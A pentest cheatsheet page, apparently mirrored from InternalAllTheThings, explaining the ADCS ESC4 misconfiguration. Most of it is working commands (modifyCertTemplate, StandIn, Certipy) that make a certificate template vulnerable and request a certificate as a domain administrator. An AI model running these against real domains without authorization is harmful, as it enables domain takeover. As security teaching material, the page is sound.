daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adcs-esc04.md (2142B)


      1 ---
      2 title: "Active Directory - Certificate ESC4"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adcs-esc04.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc04.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Certificate ESC4
     12 
     13 ## ESC4 - Access Control Vulnerabilities
     14 
     15 > Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
     16 
     17 * Search for `WriteProperty` with value `00000000-0000-0000-0000-000000000000` using [modifyCertTemplate](https://github.com/fortalice/modifyCertTemplate)
     18 
     19   ```ps1
     20   python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -get-acl
     21   ```
     22 
     23 * Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1
     24 
     25   ```ps1
     26   python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag
     27 
     28   # Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template. 
     29   C:\>StandIn.exe --adcs --filter WebServer --ess --add
     30   ```
     31 
     32 * Perform ESC1 and then restore the value
     33 
     34   ```ps1
     35   python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
     36   ```
     37 
     38 Using Certipy
     39 
     40 ```ps1
     41 # overwrite the configuration to make it vulnerable to ESC1
     42 certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old
     43 # request a certificate based on the ESC4 template, just like ESC1.
     44 certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC4' -alt 'administrator@corp.local'
     45 # restore the old configuration
     46 certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json
     47 ```
     48 
     49 ## References
     50 
     51 * [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)